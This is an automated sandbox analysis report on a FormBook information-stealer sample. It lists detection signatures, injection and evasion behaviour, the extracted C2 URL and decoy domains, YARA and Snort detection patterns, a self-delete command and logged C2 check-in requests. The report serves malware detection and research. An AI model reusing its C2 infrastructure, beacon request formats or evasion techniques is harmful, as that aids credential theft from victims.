Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report pMbPS8nCm1.exe

Overview

General Information

Sample Name:pMbPS8nCm1.exe
Analysis ID:452687
MD5:de87f1794377537dda721afd9137e491
SHA1:3b0480a4afe176722d9b8cf6f9f9c9257b1d132f
SHA256:b0a684c7dfc5a94e3dd2edcb1c706eae088ff9d701ec55f0adb1ae977e5e9081
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • pMbPS8nCm1.exe (PID: 3492 cmdline: 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: DE87F1794377537DDA721AFD9137E491)
    • pMbPS8nCm1.exe (PID: 5800 cmdline: 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: DE87F1794377537DDA721AFD9137E491)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 4396 cmdline: /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.pMbPS8nCm1.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.pMbPS8nCm1.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.pMbPS8nCm1.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        2.1.pMbPS8nCm1.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.1.pMbPS8nCm1.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.aizaibali.com/Avira URL Cloud: Label: malware
          Source: http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxhAvira URL Cloud: Label: malware
          Source: http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGNAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: pMbPS8nCm1.exeVirustotal: Detection: 26%Perma Link
          Source: pMbPS8nCm1.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: pMbPS8nCm1.exeJoe Sandbox ML: detected
          Source: 13.2.raserver.exe.302d450.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.pMbPS8nCm1.exe.5a0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.2.raserver.exe.5167960.6.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: pMbPS8nCm1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: pMbPS8nCm1.exe, 00000001.00000003.245067685.0000000002480000.00000004.00000001.sdmp, pMbPS8nCm1.exe, 00000002.00000002.306527493.0000000000A10000.00000040.00000001.sdmp, raserver.exe, 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pMbPS8nCm1.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 4x nop then pop esi2_2_00415852
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 4x nop then pop ebx2_2_00406A98
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 4x nop then pop edi2_2_00415699
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi13_2_009B5852
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx13_2_009A6A99
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi13_2_009B5699

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1Host: www.cochez.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1Host: www.cindywillardrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1Host: www.wideawakemomma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1Host: www.vermogenswerte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1Host: www.thenorthgoldline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 95.215.210.10 95.215.210.10
          Source: Joe Sandbox ViewASN Name: NEWIT-ASRU NEWIT-ASRU
          Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1Host: www.cochez.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1Host: www.cindywillardrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1Host: www.wideawakemomma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1Host: www.vermogenswerte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1Host: www.thenorthgoldline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cochez.club
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 16:05:24 GMTServer: Apache/2.4.6 (CentOS) PHP/7.3.19Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>
          Source: raserver.exe, 0000000D.00000002.513072851.00000000052E2000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmpString found in binary or memory: http://www.aizaibali.com/
          Source: raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmpString found in binary or memory: http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: pMbPS8nCm1.exe, 00000001.00000002.248667021.000000000078A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
